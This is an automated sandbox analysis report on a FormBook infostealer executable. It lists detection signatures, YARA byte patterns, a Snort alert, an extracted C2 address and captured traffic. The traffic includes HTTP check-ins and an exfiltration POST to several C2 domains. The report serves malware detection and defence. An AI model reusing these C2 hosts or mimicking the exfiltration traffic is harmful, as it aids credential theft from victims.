Windows Analysis Report
NHYGUnNN.exe

Overview

General Information

Sample Name: NHYGUnNN.exe
Analysis ID: 756156
MD5: 4f9c8432b57fa1aa875071de547ba947
SHA1: e1cc52fd851621743ba562a65161bfafed8e6b2b
SHA256: 9f0d17930a9312b8d8dfb23119b57fed676a1bb15fc1582754ab94201651b221
Tags: exe, formbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • NHYGUnNN.exe (PID: 5380 cmdline: C:\Users\user\Desktop\NHYGUnNN.exe MD5: 4F9C8432B57FA1AA875071DE547BA947)
    • RegSvcs.exe (PID: 5148 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4844 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup
{"C2 list": ["www.needook.com/4u5a/"]}
Source | Rule | Description | Author | Strings
0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x6631:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f070:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17e07:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x17c05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x176b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17d07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa49a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
    • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
    • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      No Sigma rule has matched
      Timestamp: 11/29/22-18:25:42.914102
      Source IP: 192.168.2.6
      Destination IP: 154.209.6.241
      SID:2829004
      Source Port:49722
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      AV Detection

      Source: NHYGUnNN.exe; ReversingLabs: Detection: 27%
      Source: Yara match; File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: NHYGUnNN.exe; Joe Sandbox ML: detected
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.needook.com/4u5a/"]}
      Source: NHYGUnNN.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose,10_2_00BD2CA0
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 4x nop then pop edi; 10_2_00BC88B0
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 4x nop then pop edi; 10_2_00BC88AF
      Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 4x nop then pop edi; 10_2_00BC4376

      Networking

      Source: C:\Windows\explorer.exe; Network Connect: 38.55.236.89 80
      Source: C:\Windows\explorer.exe; Domain query: www.darkchocolatebliss.com
      Source: C:\Windows\explorer.exe; Domain query: www.marketmall.digital
      Source: C:\Windows\explorer.exe; Network Connect: 172.67.148.132 80
      Source: C:\Windows\explorer.exe; Network Connect: 54.38.220.85 80
      Source: C:\Windows\explorer.exe; Network Connect: 154.209.6.241 80
      Source: C:\Windows\explorer.exe; Network Connect: 89.31.143.1 80
      Source: C:\Windows\explorer.exe; Domain query: www.canadianlocalbusiness.com
      Source: C:\Windows\explorer.exe; Domain query: www.y31jaihdb6zm87.buzz
      Source: C:\Windows\explorer.exe; Network Connect: 162.213.255.142 80
      Source: C:\Windows\explorer.exe; Domain query: www.ope-cctv.com
      Source: C:\Windows\explorer.exe; Domain query: www.dersameh.com
      Source: Traffic; Snort IDS: 2829004 ETPRO TROJAN FormBook CnC Checkin (POST) 192.168.2.6:49722 -> 154.209.6.241:80
      Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
      Source: Malware configuration extractor; URLs: www.needook.com/4u5a/
      Source: Joe Sandbox View; ASN Name: COGENT-174US COGENT-174US
      Source: Joe Sandbox View; ASN Name: QSC-AG-IPXDE QSC-AG-IPXDE
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1Host: www.ope-cctv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1Host: www.dersameh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1Host: www.marketmall.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 89.31.143.1 89.31.143.1
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflate
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflate
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.darkchocolatebliss.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.darkchocolatebliss.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflate
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.darkchocolatebliss.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.darkchocolatebliss.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflate
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflate
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.y31jaihdb6zm87.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.y31jaihdb6zm87.buzz/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflate
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.marketmall.digitalConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.marketmall.digitalUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.marketmall.digital/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflate
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.marketmall.digitalConnection: closeContent-Length: 1454Cache-Control: no-cacheOrigin: http://www.marketmall.digitalUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.marketmall.digital/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflate
      Source: global trafficHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.canadianlocalbusiness.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.canadianlocalbusiness.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 6c 43 62 77 37 51 6c 56 4d 46 5a 67 67 43 4f 73 59 4c 4b 6b 4a 51 47 58 76 58 46 49 49 45 70 38 35 54 65 6a 39 36 75 2d 35 6b 7a 72 58 62 7a 39 43 75 79 6b 45 4a 70 77 61 34 59 35 72 6b 73 4e 7e 48 38 6a 4f 42 62 58 62 58 4d 44 74 67 45 7a 58 30 33 41 6a 6e 59 52 62 30 55 76 54 4b 36 5a 37 31 59 51 6c 45 58 6e 69 51 49 45 74 64 51 5f 73 75 47 50 39 46 6f 4b 42 34 53 4e 61 56 4a 4d 71 6e 61 74 79 76 70 64 73 4f 76 33 6e 69 7a 51 64 33 34 76 68 6d 45 35 67 72 64 6c 36 2d 38 5a 7e 4f 73 6a 63 50 46 64 28 72 6f 58 46 43 34 31 55 52 49 6a 45 31 73 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=lCbw7QlVMFZggCOsYLKkJQGXvXFIIEp85Tej96u-5kzrXbz9CuykEJpwa4Y5rksN~H8jOBbXbXMDtgEzX03AjnYRb0UvTK6Z71YQlEXniQIEtdQ_suGP9FoKB4SNaVJMqnatyvpdsOv3nizQd34vhmE5grdl6-8Z~OsjcPFd(roXFC41URIjE1s.
      Source: global traffic HTTP traffic detected: POST /4u5a/ HTTP/1.1 Host: www.canadianlocalbusiness.com Connection: close Content-Length: 1454 Cache-Control: no-cache Origin: http://www.canadianlocalbusiness.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.canadianlocalbusiness.com/4u5a/ Accept-Language: en-US Accept-Encoding: gzip, deflate
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 29 Nov 2022 17:25:07 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Tue, 29 Nov 2022 17:25:25 GMT Content-Type: text/html Content-Length: 178 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 29 Nov 2022 17:11:54 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 29 Nov 2022 17:12:05 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 29 Nov 2022 17:12:07 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 29 Nov 2022 17:25:51 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 29 Nov 2022 17:25:53 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 29 Nov 2022 17:25:56 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html; charset=utf-8
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 29 Nov 2022 17:26:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4Bm5oT6L32EHhQScn%2FtDbeMq%2BGSCtJ4rHUlR%2F9gG1wt8%2FwTsgoIiTesoXJRrMBYYUrbydAF9DG4SBVpxme%2F4Q6xkkqvRLysGUpAO2uDyfGHGC9THh5E8MONAvbn6lHBEf9ryiEAkI5ZF4vZzenvFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 771d0bc54f76cb33-DUS Content-Encoding: gzip alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 29 Nov 2022 17:26:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jaa7kcfd7bhqdLX%2BdsVwejqS0LNj%2B78qOvyX9vxAKUqLl0zphihGHPKzcKLvxmdQpMSPuS62wkF%2B2VPDre1rQCML7ysqKeZLpQKERY5%2Fpc0doM%2BigaFk2AS6tyy2cLB5INHeF6%2FnLbEv1IZyRvjzOg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 771d0bd20dfdcb0d-DUS Content-Encoding: gzip alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 29 Nov 2022 17:26:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Clw8fY7BTlk%2BiuvgOg38eNqUX%2BGkg%2FfQmp23yaEcJNSKPLcsQppB4ilga4hDWbNYtsCNEfZxXpq%2BFcatW2a3IHfDbDeR20jL6T6YaLWHd83aJ2ntsmrCUXAOGPyWH8DcwEGCG9SmWqqhZrRcNN9ynw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 771d0bdedcba9b83-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.304813988.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.240724345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283521778.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253709611.0000000008442000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: 1--Lt08NN.10.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: 1--Lt08NN.10.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico https://www.ecosia.org/search?q=
      Source: 1--Lt08NN.10.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: 1--Lt08NN.10.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: 1--Lt08NN.10.dr String found in binary or memory: https://duckduckgo.com/favicon.ico https://duckduckgo.com/?q=
      Source: NETSTAT.EXE, 0000000A.00000002.501856289.00000000042BE000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Kanit:200
      Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com/favicon.ico https://search.yahoo.com/search
      Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
      Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
      Source: 1--Lt08NN.10.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
      Source: 1--Lt08NN.10.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknown HTTP traffic detected: POST /4u5a/ HTTP/1.1 Host: www.dersameh.com Connection: close Content-Length: 190 Cache-Control: no-cache Origin: http://www.dersameh.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.dersameh.com/4u5a/ Accept-Language: en-US Accept-Encoding: gzip, deflate
      Source: unknown DNS traffic detected: queries for: www.ope-cctv.com
      Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1 Host: www.ope-cctv.com Connection: close
      Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1 Host: www.dersameh.com Connection: close
      Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1 Host: www.darkchocolatebliss.com Connection: close
      Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1 Host: www.y31jaihdb6zm87.buzz Connection: close
      Source: global traffic HTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1 Host: www.marketmall.digital Connection: close
      Source: global traffic HTTP traffic detected: GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1 Host: www.canadianlocalbusiness.com Connection: close

      E-Banking Fraud

      Source: Yara match File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
